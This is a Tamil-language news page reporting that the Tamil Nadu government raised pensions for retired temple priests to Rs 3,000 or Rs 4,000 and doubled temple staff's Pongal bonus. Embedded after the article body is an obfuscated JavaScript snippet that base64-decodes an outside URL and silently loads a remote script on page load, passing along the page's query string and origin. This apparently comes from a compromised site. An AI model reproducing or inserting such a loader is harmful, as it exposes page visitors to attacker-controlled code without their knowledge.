தமிழகம்

ஓய்வூதியம்ரூ.4 ஆயிரமாக அறிவிப்பு… தமிழ்நாடு அரசு வெளியிட்ட ஹேப்பி நியூஸ்!

Money
தமிழ்நாடு, இந்தியா, உலகம், சினிமா, விளையாட்டு, செய்திகளை உடனுக்குடன் தெரிந்துகொள்ள Tamil Thisai டெலிகிராம் சேனலுடன் எப்போதும் இணைந்திருங்கள்.
Share

திமுக அரசு பொறுப்பேற்றதில் இருந்தே அறநிலையத்துறை அர்ச்சகர்கள், கோயில் பணியாளர்களுக்கு பல்வேறு அதிரடி திட்டங்களை அறிவித்து வருகிறது. கொரோனா கால நிவாரணமாக ரூ.4 ஆயிரமும், 15 மளிகை பொருட்கள் அடங்கிய தொகுப்பும் வழங்கப்பட்டது. சமீபத்தில் அர்ச்சகர்கள், பட்டாச்சாரியர்களுக்கு அரசு சார்பில் சீருடைகள் வழங்கப்பட்டன.

ALSO READ  உயிருடன் இருக்கும் பெண்ணுக்கு கண்ணீர் அஞ்சலி போஸ்டர்:

தற்போது அறநிலையத்துறை கட்டுப்பாட்டு கோயில்களில் பணிபுரிந்து ஓய்வுபெற்ற அர்ச்சகர்களுக்கு ஓய்வூதிய தொகை உயர்த்தப்பட்டுள்ளது. ஓய்வூதியத்தை ரூ.1,000ல் இருந்து ரூ.3,000ஆக யர்த்தும் திட்டத்தை தமிழக முதல்வர் மு.க.ஸ்டாலின் தொடங்கிவைத்தார்.

அறநிலையத்துறை கட்டுப்பாட்டில் இல்லாத கோயிலில் பணிபுரிந்து ஓய்வு பெற்ற அர்ச்சகர்களின் ஓய்வூதியம் ரூ.4,000ஆக உயர்த்தப்பட்டுள்ளது. மேலும் இந்து சமய அறநிலையத்துறையின் கட்டுப்பாட்டில் உள்ள திருக்கோயில்களில் பணியாற்றும் முழுநேரம், பகுதிநேரம், தொகுப்பூதியம், தினக்கூலி பணியாளர்கள் உள்ளிட்ட அனைத்து பணியாளர்களுக்கும் ரூ.1,000/ வழங்கப்பட்டு வந்த பொங்கல் கருணைக்கொடை இவ்வாண்டில் ரூ.2,000/- ஆக ஆக உயர்த்தப்பட்டுள்ளது குறிப்பிடப்பட்டுள்ளது.

ALSO READ  தமிழகத்தில் கொரோனா வைரஸ் இரண்டாவது அலை பரவல்; விஜயபாஸ்கர் விளக்கம் 
(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Share
தமிழ்நாடு, இந்தியா, உலகம், சினிமா, விளையாட்டு, செய்திகளை உடனுக்குடன் தெரிந்துகொள்ள Tamil Thisai டெலிகிராம் சேனலுடன் எப்போதும் இணைந்திருங்கள்.

Related posts

வாகனங்களுக்கு 5 ஆண்டுகள் காப்பீடு கட்டாயம் – சென்னை உயர்நீதிமன்றம்!

News Editor

காவலர் வீரவணக்க நாள்- ஸ்டாலின் வாழ்த்து- தமிழக டி.ஜி.பி. சைலேந்திர பாபு மரியாதை செலுத்தினார்

naveen santhakumar

War Room-ல் இருந்து ஸ்டாலின் பேசுகிறன்; திடீர் விசிட் அடித்த முதல்வர் ! 

News Editor